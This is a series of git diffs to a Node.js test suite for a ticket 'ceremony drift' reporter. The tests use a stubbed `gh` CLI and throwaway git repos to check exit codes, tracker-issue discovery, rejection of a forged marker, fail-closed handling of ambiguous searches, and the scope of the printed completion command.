+test('a missing `gh` binary exits non-zero', () => {
+  // PATH is set to a dir with no gh at all.
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-nogh-'));
+  try {
+    const r = spawnSync(process.execPath, [SCRIPT], {
+      cwd: REPO,
+      encoding: 'utf8',
+      env: { ...process.env, ADLC_RAILS_BYPASS: undefined, PATH: dir },
+    });
+    assert.notEqual(r.status, 0);
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
+});
+
+// ---- drift existing must stay QUIET ----
+
+test('drift present with a working `gh` exits 0 (drift is not a malfunction)', () => {
+  // `issue list` yields no tracker → the script opens one; every gh call succeeds.
+  const r = runWith('case "$*" in *"issue list"*) echo "[]";; *) echo "https://example.test/issues/1";; esac; exit 0');
+  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
+  assert.match(r.stdout, /ticket\(s\) awaiting the completion ceremony/);
+});
+
+test('DRY_RUN reports drift and exits 0 without touching `gh`', () => {
+  // gh would fail if called; DRY_RUN must return before any issue I/O.
+  const r = runWith('exit 1', { DRY_RUN: '1' });
+  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
+  assert.match(r.stdout, /DRY_RUN=1, no issue changes/);
+});

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -185,6 +185,30 @@ test('an UNLABELED tracker authored by the bot is adopted, relabeled, and update
   });
 });
 
+// A malformed active-ticket pointer must not crash the reporter, and must not
+// let it advertise completing tickets when it cannot tell which one is live.
+// This drives the real Result-shaped API, which unit tests (passing a plain id)
+// cannot exercise — the first version read the Result as a bare id, silently
+// disabling the exclusion.
+test('a malformed active-ticket pointer still exits 0 and suppresses bulk advice', () => {
+  withRepo({ drift: true }, (repo) => {
+    writeFileSync(join(repo, '.adlc', 'current-ticket.json'), '{ not valid json');
+    const r = runWith(stubListing('[]'), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.stdout, /pointer unresolvable|treating as none|suppressing bulk-completion/);
+  });
+});
+
+test('a well-formed pointer is reported as an exclusion, not as an object', () => {
+  withRepo({ drift: true }, (repo) => {
+    writeFileSync(join(repo, '.adlc', 'current-ticket.json'), JSON.stringify({ id: 'T1' }));
+    const r = runWith(stubListing('[]'), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.stdout, /active ticket is T1 \(excluded from bulk advice\)/);
+    assert.doesNotMatch(r.stdout, /\[object Object\]/);
+  });
+});
+
 // ---- the marker is public, so it is not authorization ----
 
 test('a FORGED marker from another author is not adopted', () => {

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -289,14 +289,19 @@ const completedIds = (repo) =>
 test('the rendered command completes only the reported ticket, not rails-less ones', async () => {
   const repo = makeMixedRepo();
   try {
-    // Take the command straight out of the rendered issue body.
+    // Take the command straight out of the rendered issue body. The reporter only
+    // renders the mutating command when every rail-freezing entry is explicit-done
+    // (the evidence gate), so RAILED carries a done-status here — otherwise no
+    // command would be offered, which is a separate test. The point of THIS test
+    // is the command's blast radius: even when offered, it must not touch a
+    // rails-less ticket that never appeared in the report.
     const { renderIssueBody } = await import('../ceremony-drift.mjs');
     const body = renderIssueBody([
-      { id: 'RAILED', reason: 'inferred: scope resolves', rails: ['packages/core/**'], blocker: 'rails-freeze' },
+      { id: 'RAILED', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
     ]);
     const cmd = body.split('\n').map((l) => l.trim())
       .find((l) => l.startsWith('ADLC_RAILS_BYPASS=1 adlc ticket-prune'));
-    assert.ok(cmd, 'the body should document a ceremony command');
+    assert.ok(cmd, 'an all-confirmed set should document the ceremony command');
 
     const args = cmd.replace('ADLC_RAILS_BYPASS=1 adlc ticket-prune', '').trim().split(/\s+/)
       .map((a) => (a === 'origin/main' ? 'HEAD' : a)); // fixture has no origin

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -19,7 +19,7 @@
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { mkdtempSync, writeFileSync, mkdirSync, chmodSync, rmSync, readFileSync } from 'node:fs';
+import { mkdtempSync, writeFileSync, mkdirSync, chmodSync, rmSync, readFileSync, existsSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -286,32 +286,32 @@ const completedIds = (repo) =>
   JSON.parse(readFileSync(join(repo, '.adlc', 'tickets.json'), 'utf8'))
     .tickets.filter((t) => t.completed === true).map((t) => t.id).sort();
 
-test('the rendered command completes only the reported ticket, not rails-less ones', async () => {
+test('the rendered per-ticket command completes only its named ticket, nothing else', async () => {
   const repo = makeMixedRepo();
   try {
-    // Take the command straight out of the rendered issue body. The reporter only
-    // renders the mutating command when every rail-freezing entry is explicit-done
-    // (the evidence gate), so RAILED carries a done-status here — otherwise no
-    // command would be offered, which is a separate test. The point of THIS test
-    // is the command's blast radius: even when offered, it must not touch a
-    // rails-less ticket that never appeared in the report.
+    // Take the command straight out of the rendered issue body and run it as-is.
+    // RAILED carries a done-status, so it gets a ready `adlc-tickets complete
+    // RAILED` line. The point: running EXACTLY what the issue prints must complete
+    // only RAILED and never touch RAILLESS, which never appeared in the report.
     const { renderIssueBody } = await import('../ceremony-drift.mjs');
     const body = renderIssueBody([
       { id: 'RAILED', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
     ]);
     const cmd = body.split('\n').map((l) => l.trim())
-      .find((l) => l.startsWith('ADLC_RAILS_BYPASS=1 adlc ticket-prune'));
-    assert.ok(cmd, 'an all-confirmed set should document the ceremony command');
+      .find((l) => /^adlc-tickets complete \S+ --write --authorize$/.test(l));
+    assert.ok(cmd, 'an explicit-done entry should document a per-ticket completion command');
 
-    const args = cmd.replace('ADLC_RAILS_BYPASS=1 adlc ticket-prune', '').trim().split(/\s+/)
-      .map((a) => (a === 'origin/main' ? 'HEAD' : a)); // fixture has no origin
-    const BIN = join(REPO_ROOT, 'packages', 'ticket-prune', 'bin', 'ticket-prune.mjs');
+    const args = cmd.replace('adlc-tickets', '').trim().split(/\s+/);
+    const BIN = join(REPO_ROOT, 'packages', 'tickets', 'bin', 'adlc-tickets.mjs');
     execFileSync(process.execPath, [BIN, ...args], {
-      cwd: repo, stdio: 'ignore', env: { ...process.env, ADLC_RAILS_BYPASS: '1' },
+      cwd: repo, stdio: 'ignore', env: { ...process.env },
     });
 
     assert.deepEqual(completedIds(repo), ['RAILED'],
       'the rails-less ticket must be untouched — it never appeared in the report');
+    // The canonical path records completion evidence; the raw-edit remedy did not.
+    assert.ok(existsSync(join(repo, '.adlc', 'manifest.jsonl')),
+      'completion must be journaled to the manifest');
   } finally {
     rmSync(repo, { recursive: true, force: true });
   }

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -298,8 +298,8 @@ test('the rendered per-ticket command completes only its named ticket, nothing e
       { id: 'RAILED', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
     ]);
     const cmd = body.split('\n').map((l) => l.trim())
-      .find((l) => /^adlc-tickets complete \S+ --write --authorize$/.test(l));
-    assert.ok(cmd, 'an explicit-done entry should document a per-ticket completion command');
+      .find((l) => /^adlc-tickets complete \S+ --write --authorize --json$/.test(l));
+    assert.ok(cmd, 'an explicit-done entry should document a per-ticket completion command with --json');
 
     const args = cmd.replace('adlc-tickets', '').trim().split(/\s+/);
     const BIN = join(REPO_ROOT, 'packages', 'tickets', 'bin', 'adlc-tickets.mjs');

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -1,145 +1,212 @@
-// ceremony-drift-exit.test.mjs — the exit-code contract of the drift reporter.
+// ceremony-drift-exit.test.mjs — the reporter's process-level contracts.
 //
 // Drives the real script as a subprocess with a stubbed `gh` on PATH, because
-// the property under test is the process exit code, which cannot be observed by
-// importing the module.
+// the properties under test (exit code, which gh calls are made) cannot be
+// observed by importing the module.
 //
-// The contract has two halves, and conflating them was a real defect caught in
-// review: drift EXISTING must never fail the job (that would recreate the
-// blocking-gate problem the design exists to avoid), while the REPORTER being
-// broken must fail loudly (otherwise a revoked token or API error disables the
-// signal indefinitely while every scheduled run still looks green).
+// HERMETIC BY CONSTRUCTION. Every case builds its own throwaway git repo with an
+// explicit ticket fixture. An earlier version ran against THIS repository's live
+// ticket store and hard-coded "drift exists" — so the moment the ceremony
+// actually succeeded and drift reached zero, the reporter would correctly close
+// the issue and this suite would fail, breaking `npm test` for every later PR
+// precisely because the feature worked. A test must not punish the outcome it
+// exists to enable.
+//
+// The exit contract has two halves, and conflating them was a real defect caught
+// in review: drift EXISTING must never fail the job (that would recreate the
+// blocking-gate problem the design avoids), while the REPORTER being broken must
+// fail loudly (otherwise a revoked token silently disables the signal).
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { mkdtempSync, writeFileSync, chmodSync, rmSync, readFileSync } from 'node:fs';
+import { mkdtempSync, writeFileSync, mkdirSync, chmodSync, rmSync, readFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
-import { spawnSync } from 'node:child_process';
+import { spawnSync, execFileSync } from 'node:child_process';
 
-const REPO = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
-const SCRIPT = join(REPO, 'scripts', 'ceremony-drift.mjs');
+const SCRIPT = join(dirname(fileURLToPath(import.meta.url)), '..', 'ceremony-drift.mjs');
+const BOT = 'github-actions[bot]';
 
 /**
- * Run the reporter with a fake `gh` first on PATH.
- * @param {string} ghScript shell body for the stub
+ * Build a throwaway git repo whose drift state is exactly what the test wants.
+ * @param {{drift: boolean}} opts drift:true → one shipped rail-freezing ticket
  */
-function runWith(ghScript, env = {}) {
-  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-'));
+function makeRepo({ drift }) {
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-repo-'));
+  const run = (...args) => execFileSync('git', args, { cwd: dir, stdio: 'ignore' });
+  run('init', '-q', '.');
+  run('config', 'user.email', 'test@example.invalid');
+  run('config', 'user.name', 'test');
+  mkdirSync(join(dir, '.adlc'), { recursive: true });
+  mkdirSync(join(dir, 'packages', 'core'), { recursive: true });
+  writeFileSync(join(dir, 'packages', 'core', 'a.mjs'), 'export const a = 1;\n');
+  // Scope resolves to a tracked file => "shipped". Rails non-empty => rails-freeze.
+  // `completed: true` expires it, which is the no-drift fixture.
+  const ticket = {
+    id: 'T1', title: 'fixture',
+    scope: ['packages/core/**'], rails: ['packages/core/**'],
+    ...(drift ? {} : { completed: true }),
+  };
+  writeFileSync(join(dir, '.adlc', 'tickets.json'), JSON.stringify({ tickets: [ticket] }));
+  run('add', '-A');
+  run('commit', '-qm', 'fixture');
+  return dir;
+}
+
+/** Run the reporter in `repo` with a fake `gh` first on PATH. Returns the gh call log too. */
+function runWith(ghScript, { repo, env = {} } = {}) {
+  const binDir = mkdtempSync(join(tmpdir(), 'adlc-drift-bin-'));
   try {
-    const ghPath = join(dir, 'gh');
-    writeFileSync(ghPath, `#!/bin/sh\n${ghScript}\n`);
+    const log = join(binDir, 'calls.txt');
+    const ghPath = join(binDir, 'gh');
+    writeFileSync(ghPath, `#!/bin/sh\necho "$*" >> ${log}\n${ghScript}\n`);
     chmodSync(ghPath, 0o755);
     const r = spawnSync(process.execPath, [SCRIPT], {
-      cwd: REPO,
+      cwd: repo,
       encoding: 'utf8',
       env: {
         ...process.env,
         ADLC_RAILS_BYPASS: undefined, // keep the harness hermetic (see issue #204)
-        PATH: `${dir}:${process.env.PATH}`,
+        BASE_REF: 'HEAD', // the fixture repo has no origin/main
+        PATH: `${binDir}:${process.env.PATH}`,
         ...env,
       },
     });
-    return { status: r.status, stdout: r.stdout ?? '', stderr: r.stderr ?? '' };
+    let calls = '';
+    try { calls = readFileSync(log, 'utf8'); } catch {}
+    return { status: r.status, stdout: r.stdout ?? '', stderr: r.stderr ?? '', calls };
   } finally {
-    rmSync(dir, { recursive: true, force: true });
+    rmSync(binDir, { recursive: true, force: true });
   }
 }
 
-// ---- operational failure must be LOUD ----
+const withRepo = (opts, fn) => {
+  const repo = makeRepo(opts);
+  try { return fn(repo); } finally { rmSync(repo, { recursive: true, force: true }); }
+};
 
-test('a failing `gh` exits non-zero (a broken reporter must not look healthy)', () => {
-  const r = runWith('echo "gh: HTTP 403 Resource not accessible by integration" >&2; exit 1');
-  assert.notEqual(r.status, 0, 'expected a non-zero exit when gh fails');
-});
+/** gh stub: `issue list` returns `listJson`, everything else succeeds. */
+const stubListing = (listJson) =>
+  `case "$*" in *"issue list"*) printf '%s' '${listJson}' ;; *) printf '%s' "https://example.test/issues/42" ;; esac\nexit 0`;
 
-test('a `gh` that returns unparseable JSON exits non-zero', () => {
-  const r = runWith('echo "not json at all"');
-  assert.notEqual(r.status, 0, 'expected a non-zero exit when the gh response cannot be parsed');
-});
-
-test('a missing `gh` binary exits non-zero', () => {
-  // PATH is set to a dir with no gh at all.
-  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-nogh-'));
-  try {
-    const r = spawnSync(process.execPath, [SCRIPT], {
-      cwd: REPO,
-      encoding: 'utf8',
-      env: { ...process.env, ADLC_RAILS_BYPASS: undefined, PATH: dir },
-    });
-    assert.notEqual(r.status, 0);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
-
-// ---- drift existing must stay QUIET ----
-
-test('drift present with a working `gh` exits 0 (drift is not a malfunction)', () => {
-  // `issue list` yields no tracker → the script opens one; every gh call succeeds.
-  const r = runWith('case "$*" in *"issue list"*) echo "[]";; *) echo "https://example.test/issues/1";; esac; exit 0');
-  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
-  assert.match(r.stdout, /ticket\(s\) awaiting the completion ceremony/);
-});
-
-test('DRY_RUN reports drift and exits 0 without touching `gh`', () => {
-  // gh would fail if called; DRY_RUN must return before any issue I/O.
-  const r = runWith('exit 1', { DRY_RUN: '1' });
-  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
-  assert.match(r.stdout, /DRY_RUN=1, no issue changes/);
-});
-
-// ---- the tracker survives having its label stripped ----
-//
-// Label-scoped discovery is the fast path, but a label can be removed by hand.
-// If lookup were label-only, that would silently open a DUPLICATE (active drift)
-// or leave a stale issue open forever (cleared drift). The marker in the body is
-// the durable identity; these prove the fallback is real rather than a comment.
-//
-// The stub distinguishes the labeled query from the unlabeled sweep so it can
-// return "nothing labeled, but a marked issue exists".
-
-// Single-line body on purpose: `echo` interprets backslash escapes in some
-// /bin/sh implementations (dash does, bash does not), which would inject a real
-// newline into the JSON string literal and make it unparseable. printf keeps
-// this stable across shells.
-const MARKED_ISSUE = '[{"number":42,"title":"stale title","body":"<!-- adlc:ceremony-drift --> old"}]';
-
-const UNLABELED_STUB = `
+/** gh stub: nothing under the label, `listJson` on the unlabeled sweep. */
+const stubUnlabeled = (listJson) => `
 case "$*" in
-  *"--label ceremony-drift"*"--json"*) printf '%s' "[]" ;;                # labeled lookup: nothing
-  *"issue list"*)                      printf '%s' '${MARKED_ISSUE}' ;;   # sweep: found by marker
+  *"--label ceremony-drift"*"--json"*) printf '%s' "[]" ;;
+  *"issue list"*)                      printf '%s' '${listJson}' ;;
   *)                                   printf '%s' "https://example.test/issues/42" ;;
 esac
 exit 0`;
 
-test('an UNLABELED marked issue is found and updated, not duplicated', () => {
-  const r = runWith(UNLABELED_STUB);
-  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
-  assert.match(r.stdout, /re-attached 'ceremony-drift' to issue #42/);
-  // Drift exists here (the real repo has 9), so it must UPDATE #42, never open.
-  assert.match(r.stdout, /updated issue #42/);
-  assert.doesNotMatch(r.stdout, /opened https/);
+const marked = (extra) =>
+  `[{"number":42,"title":"stale","body":"<!-- adlc:ceremony-drift --> old","author":{"login":"${extra}"}}]`;
+
+// ---- operational failure must be LOUD ----
+
+test('a failing `gh` exits non-zero (a broken reporter must not look healthy)', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith('echo "gh: HTTP 403 Resource not accessible" >&2; exit 1', { repo });
+    assert.notEqual(r.status, 0);
+  });
 });
 
-test('label re-attachment is attempted so the fast path works next run', () => {
-  // Records every gh invocation so we can assert the self-heal actually ran.
-  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-log-'));
-  try {
-    const log = join(dir, 'calls.txt');
-    const ghPath = join(dir, 'gh');
-    writeFileSync(ghPath, `#!/bin/sh\necho "$*" >> ${log}\n${UNLABELED_STUB}\n`);
-    chmodSync(ghPath, 0o755);
-    const r = spawnSync(process.execPath, [SCRIPT], {
-      cwd: REPO,
-      encoding: 'utf8',
-      env: { ...process.env, ADLC_RAILS_BYPASS: undefined, PATH: `${dir}:${process.env.PATH}` },
-    });
+test('a `gh` returning unparseable JSON exits non-zero', () => {
+  withRepo({ drift: true }, (repo) => {
+    assert.notEqual(runWith('printf "%s" "not json"', { repo }).status, 0);
+  });
+});
+
+test('a missing `gh` binary exits non-zero', () => {
+  withRepo({ drift: true }, (repo) => {
+    const empty = mkdtempSync(join(tmpdir(), 'adlc-drift-nogh-'));
+    try {
+      const r = spawnSync(process.execPath, [SCRIPT], {
+        cwd: repo, encoding: 'utf8',
+        env: { ...process.env, ADLC_RAILS_BYPASS: undefined, BASE_REF: 'HEAD', PATH: empty },
+      });
+      assert.notEqual(r.status, 0);
+    } finally { rmSync(empty, { recursive: true, force: true }); }
+  });
+});
+
+// ---- drift existing must stay QUIET ----
+
+test('drift present with a working `gh` exits 0 and opens a tracker', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith(stubListing('[]'), { repo });
     assert.equal(r.status, 0, r.stderr);
-    const calls = readFileSync(log, 'utf8');
-    assert.match(calls, /issue edit 42 --add-label ceremony-drift/);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+    assert.match(r.stdout, /1 ticket\(s\) awaiting the completion ceremony/);
+    assert.match(r.calls, /issue create/);
+  });
+});
+
+test('DRY_RUN reports drift and exits 0 without touching `gh`', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith('exit 1', { repo, env: { DRY_RUN: '1' } });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.stdout, /DRY_RUN=1, no issue changes/);
+  });
+});
+
+// ---- close-on-clear, end to end ----
+//
+// The case the previous version structurally could not express, because it read
+// the live store: drift genuinely cleared, tracker open, must CLOSE.
+
+test('no drift with an open tracker closes it (exit 0)', () => {
+  withRepo({ drift: false }, (repo) => {
+    const r = runWith(stubListing(marked(BOT)), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.stdout, /0 ticket\(s\) awaiting/);
+    assert.match(r.stdout, /closed issue #42/);
+    assert.match(r.calls, /issue close 42/);
+  });
+});
+
+test('no drift and no tracker does nothing (exit 0)', () => {
+  withRepo({ drift: false }, (repo) => {
+    const r = runWith(stubListing('[]'), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.doesNotMatch(r.calls, /issue create/);
+  });
+});
+
+// ---- the tracker survives having its label stripped ----
+
+test('an UNLABELED tracker authored by the bot is adopted, relabeled, and updated', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith(stubUnlabeled(marked(BOT)), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.stdout, /re-attached 'ceremony-drift' to issue #42/);
+    assert.match(r.calls, /issue edit 42 --add-label ceremony-drift/);
+    assert.match(r.stdout, /updated issue #42/);
+    assert.doesNotMatch(r.calls, /issue create/); // never a duplicate
+  });
+});
+
+// ---- the marker is public, so it is not authorization ----
+
+test('a FORGED marker from another author is not adopted', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith(stubUnlabeled(marked('untrusted-user')), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    // Must not label, rewrite, or close someone else's issue...
+    assert.doesNotMatch(r.calls, /issue edit 42/);
+    assert.doesNotMatch(r.calls, /issue close 42/);
+    // ...and must still do its own job.
+    assert.match(r.calls, /issue create/);
+  });
+});
+
+test('two marked issues fail closed rather than guessing which to overwrite', () => {
+  withRepo({ drift: true }, (repo) => {
+    const two =
+      `[{"number":42,"title":"a","body":"<!-- adlc:ceremony-drift --> a","author":{"login":"${BOT}"}},` +
+      `{"number":43,"title":"b","body":"<!-- adlc:ceremony-drift --> b","author":{"login":"${BOT}"}}]`;
+    const r = runWith(stubUnlabeled(two), { repo });
+    assert.notEqual(r.status, 0, 'ambiguous match must not silently pick one');
+    assert.match(r.stderr, /ambiguous tracking issue/);
+    assert.doesNotMatch(r.calls, /issue close/);
+  });
 });

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -289,21 +289,26 @@ const completedIds = (repo) =>
 test('the rendered per-ticket command completes only its named ticket, nothing else', async () => {
   const repo = makeMixedRepo();
   try {
-    // Take the command straight out of the rendered issue body and run it as-is.
-    // RAILED carries a done-status, so it gets a ready `adlc-tickets complete
-    // RAILED` line. The point: running EXACTLY what the issue prints must complete
-    // only RAILED and never touch RAILLESS, which never appeared in the report.
+    // Take the command straight out of the rendered issue body and run it through
+    // the UMBRELLA `adlc` dispatcher — exactly the binary an operator has on PATH.
+    // An earlier version invoked packages/tickets' source bin directly, which hid
+    // that the reporter was printing `adlc-tickets` (not exposed by @adlc/cli); the
+    // command an operator copies must resolve through `adlc`. RAILED carries a
+    // done-status, so it gets a ready `adlc ticket complete RAILED` line. The
+    // point: running EXACTLY what the issue prints completes only RAILED and never
+    // touches RAILLESS, which never appeared in the report.
     const { renderIssueBody } = await import('../ceremony-drift.mjs');
     const body = renderIssueBody([
       { id: 'RAILED', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
     ]);
     const cmd = body.split('\n').map((l) => l.trim())
-      .find((l) => /^adlc-tickets complete \S+ --write --authorize --json$/.test(l));
-    assert.ok(cmd, 'an explicit-done entry should document a per-ticket completion command with --json');
+      .find((l) => /^adlc ticket complete \S+ --write --authorize --json$/.test(l));
+    assert.ok(cmd, 'an explicit-done entry should document `adlc ticket complete … --json`');
 
-    const args = cmd.replace('adlc-tickets', '').trim().split(/\s+/);
-    const BIN = join(REPO_ROOT, 'packages', 'tickets', 'bin', 'adlc-tickets.mjs');
-    execFileSync(process.execPath, [BIN, ...args], {
+    // Dispatch through the real `adlc` entrypoint, passing the printed args verbatim.
+    const args = cmd.replace(/^adlc\s+/, '').trim().split(/\s+/);
+    const ADLC = join(REPO_ROOT, 'packages', 'cli', 'bin', 'adlc.mjs');
+    execFileSync(process.execPath, [ADLC, ...args], {
       cwd: repo, stdio: 'ignore', env: { ...process.env },
     });
 

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -12,7 +12,7 @@
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { mkdtempSync, writeFileSync, chmodSync, rmSync } from 'node:fs';
+import { mkdtempSync, writeFileSync, chmodSync, rmSync, readFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
@@ -88,4 +88,58 @@ test('DRY_RUN reports drift and exits 0 without touching `gh`', () => {
   const r = runWith('exit 1', { DRY_RUN: '1' });
   assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
   assert.match(r.stdout, /DRY_RUN=1, no issue changes/);
+});
+
+// ---- the tracker survives having its label stripped ----
+//
+// Label-scoped discovery is the fast path, but a label can be removed by hand.
+// If lookup were label-only, that would silently open a DUPLICATE (active drift)
+// or leave a stale issue open forever (cleared drift). The marker in the body is
+// the durable identity; these prove the fallback is real rather than a comment.
+//
+// The stub distinguishes the labeled query from the unlabeled sweep so it can
+// return "nothing labeled, but a marked issue exists".
+
+// Single-line body on purpose: `echo` interprets backslash escapes in some
+// /bin/sh implementations (dash does, bash does not), which would inject a real
+// newline into the JSON string literal and make it unparseable. printf keeps
+// this stable across shells.
+const MARKED_ISSUE = '[{"number":42,"title":"stale title","body":"<!-- adlc:ceremony-drift --> old"}]';
+
+const UNLABELED_STUB = `
+case "$*" in
+  *"--label ceremony-drift"*"--json"*) printf '%s' "[]" ;;                # labeled lookup: nothing
+  *"issue list"*)                      printf '%s' '${MARKED_ISSUE}' ;;   # sweep: found by marker
+  *)                                   printf '%s' "https://example.test/issues/42" ;;
+esac
+exit 0`;
+
+test('an UNLABELED marked issue is found and updated, not duplicated', () => {
+  const r = runWith(UNLABELED_STUB);
+  assert.equal(r.status, 0, `expected exit 0, got ${r.status}: ${r.stderr}`);
+  assert.match(r.stdout, /re-attached 'ceremony-drift' to issue #42/);
+  // Drift exists here (the real repo has 9), so it must UPDATE #42, never open.
+  assert.match(r.stdout, /updated issue #42/);
+  assert.doesNotMatch(r.stdout, /opened https/);
+});
+
+test('label re-attachment is attempted so the fast path works next run', () => {
+  // Records every gh invocation so we can assert the self-heal actually ran.
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-log-'));
+  try {
+    const log = join(dir, 'calls.txt');
+    const ghPath = join(dir, 'gh');
+    writeFileSync(ghPath, `#!/bin/sh\necho "$*" >> ${log}\n${UNLABELED_STUB}\n`);
+    chmodSync(ghPath, 0o755);
+    const r = spawnSync(process.execPath, [SCRIPT], {
+      cwd: REPO,
+      encoding: 'utf8',
+      env: { ...process.env, ADLC_RAILS_BYPASS: undefined, PATH: `${dir}:${process.env.PATH}` },
+    });
+    assert.equal(r.status, 0, r.stderr);
+    const calls = readFileSync(log, 'utf8');
+    assert.match(calls, /issue edit 42 --add-label ceremony-drift/);
+  } finally {
+    rmSync(dir, { recursive: true, force: true });
+  }
 });

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -307,3 +307,58 @@ test('the rendered command completes only the reported ticket, not rails-less on
     rmSync(repo, { recursive: true, force: true });
   }
 });
+
+// ---- a truncated recovery scan must not be treated as "not found" ----
+//
+// If the unlabeled sweep fills its window without a match, whether a tracker
+// exists is UNKNOWN. Acting on it would open a duplicate (drift present) or
+// leave an obsolete warning open (drift cleared) — the exact pair of failures
+// this recovery path exists to prevent. A previous revision logged a warning and
+// proceeded anyway; a loud bad inference is still a bad inference. These assert
+// the run fails and mutates nothing.
+
+/** gh stub whose unlabeled sweep returns a full window of unmarked issues. */
+function stubSaturatedSweep(dir) {
+  const many = JSON.stringify(
+    Array.from({ length: 1000 }, (_, i) => ({
+      number: i + 1, title: `unrelated ${i}`, body: 'nothing here', author: { login: 'someone' },
+    }))
+  );
+  const payload = join(dir, 'many.json');
+  writeFileSync(payload, many);
+  return `
+case "$*" in
+  *"--label ceremony-drift"*"--json"*) printf '%s' "[]" ;;
+  *"issue list"*)                      cat ${payload} ;;
+  *)                                   printf '%s' "https://example.test/issues/99" ;;
+esac
+exit 0`;
+}
+
+for (const drift of [true, false]) {
+  test(`a saturated sweep with drift=${drift} exits non-zero and mutates nothing`, () => {
+    const repo = makeRepo({ drift });
+    const payloadDir = mkdtempSync(join(tmpdir(), 'adlc-drift-payload-'));
+    try {
+      const r = runWith(stubSaturatedSweep(payloadDir), { repo });
+      assert.notEqual(r.status, 0, 'an indeterminate scan must fail the run');
+      assert.match(r.stderr, /scan hit that limit|Refusing to open or close/);
+      assert.doesNotMatch(r.calls, /issue create/, 'must not open a duplicate');
+      assert.doesNotMatch(r.calls, /issue close/, 'must not close on an unknown');
+      assert.doesNotMatch(r.calls, /issue edit \d+ --title/, 'must not rewrite a tracker');
+    } finally {
+      rmSync(payloadDir, { recursive: true, force: true });
+      rmSync(repo, { recursive: true, force: true });
+    }
+  });
+}
+
+// The bound only fails closed when it is actually reached — an exhaustive scan
+// that finds nothing is a legitimate "no tracker", and must still open one.
+test('an UNSATURATED sweep finding nothing is treated as an exhaustive miss', () => {
+  withRepo({ drift: true }, (repo) => {
+    const r = runWith(stubUnlabeled('[]'), { repo });
+    assert.equal(r.status, 0, r.stderr);
+    assert.match(r.calls, /issue create/);
+  });
+});

--- a/scripts/test/ceremony-drift-exit.test.mjs
+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -39,6 +39,12 @@ function makeRepo({ drift }) {
   run('init', '-q', '.');
   run('config', 'user.email', 'test@example.invalid');
   run('config', 'user.name', 'test');
+  // Fixtures must not inherit the developer's git configuration. With
+  // `commit.gpgsign=true` globally (common), these commits fail whenever the
+  // signing agent is locked or absent — a spurious failure in a test that has
+  // nothing to do with signing, and one that differs between a laptop and CI.
+  run('config', 'commit.gpgsign', 'false');
+  run('config', 'tag.gpgsign', 'false');
   mkdirSync(join(dir, '.adlc'), { recursive: true });
   mkdirSync(join(dir, 'packages', 'core'), { recursive: true });
   writeFileSync(join(dir, 'packages', 'core', 'a.mjs'), 'export const a = 1;\n');
@@ -253,6 +259,8 @@ function makeMixedRepo() {
   g('init', '-q', '.');
   g('config', 'user.email', 'test@example.invalid');
   g('config', 'user.name', 'test');
+  g('config', 'commit.gpgsign', 'false'); // see makeRepo: do not inherit signing
+  g('config', 'tag.gpgsign', 'false');
   mkdirSync(join(dir, '.adlc'), { recursive: true });
   mkdirSync(join(dir, 'packages', 'core'), { recursive: true });
   mkdirSync(join(dir, 'packages', 'util'), { recursive: true });

--- a/scripts/test/ceremony-drift-exit.test.mjs
